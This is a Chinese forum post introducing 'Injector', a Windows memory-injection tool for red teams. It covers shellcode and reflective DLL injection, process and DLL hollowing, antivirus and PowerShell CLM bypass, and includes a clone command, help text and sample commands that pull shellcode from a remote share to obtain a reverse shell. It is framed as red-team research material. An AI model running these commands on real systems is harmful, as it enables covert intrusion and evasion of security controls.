电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1053 人浏览分享

如何使用Injector实现Windows下的内存注入

[复制链接]
1053 0
Injector是一款功能齐全且强大的内存注入工具该工具集成了多种技术 可以帮助红队研究
人员实现在Windows系统下的内存注入。

af6919429945c45ef867d1ab38017331.jpg

关于Injector

Injector是一款功能齐全且强大的内存注入工具 该工具集成了多种技术 可以帮助红队
研究人员实现在Windows系统下的内存注入。

Injector能做什么?

针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件 该工具将帮助我们完成
后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程 它将会创建一
个记事本进程。并注入其中实现持久化感染。

支持反射DLL注入 工具将下载DLL并注入远程进程。
通过exe实现进程镂空。
使用-bypass参数 以支持使用更高级的 未记录的API来进行进程注入。
支持加密的Shellcode 比如说AES加密或异或加密等。
支持针对PowerShell的CLM绕过 可以直接将代码存防止能够执行C#代码的白名单文件夹中
比如说“C:\Windows\Tasks”。
支持DLL镂空 通过dll实现。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:
  1. git clone https://github.com/0xDivyanshu/Injector.git
复制代码

工具帮助
  1. C:\Users\admin>Injector.exe
  2. Help Options for Xenon:
  3. -m       Mode of operation
  4.         -m 1     Specifies the mode as Process injection
  5.         -m 2     Specifies the mode as Reflective DLL Injection
  6.         -m 3     Specifies the mode as Process Hollowing
  7.         -m 4     No injection! Give me my damn shell
  8.         -m 5     Powershell session via CLM bypass
  9.         -m 6     DLL hollowing
  10. -TempFile        File location that your current user can read
  11. -shellcode       Use shellcode
  12. -dll     Use dll
  13. -decrypt-xor     Specify Xor decryption for shellcode
  14.          -pass   Specifty the password for Xor decryption
  15. -decrypt-aes     Specify aes decryption for shellcode
  16.          -pass   Specifty the password for aes decryption
  17. -location        Specify the location i.e either server or local
  18. -bypass         Uses enhance attempts to bypass AV
复制代码

如需生成加密的Shellcode,请在Kali下使用Helper.exe。

工具使用样例
  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -locati
  2. on="\\192.x.x.x\share\shellcode.txt" -bypass
复制代码

上述命令将解密你的Shellcode并给你一个反向Shell。

如果你不想使用加密的Shellcode 你也可以直接使用下列命令运行下列命令:
  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"
复制代码

将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:
  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt
复制代码

上述命令将提供要给会话,我们可以使用它来执行IEX cradle 并获取一个能够绕过CLM的反向Shell。

PowerShell

你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:
  1. Invoke-Exe -loc C:\Users\john\injector.exe
复制代码

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.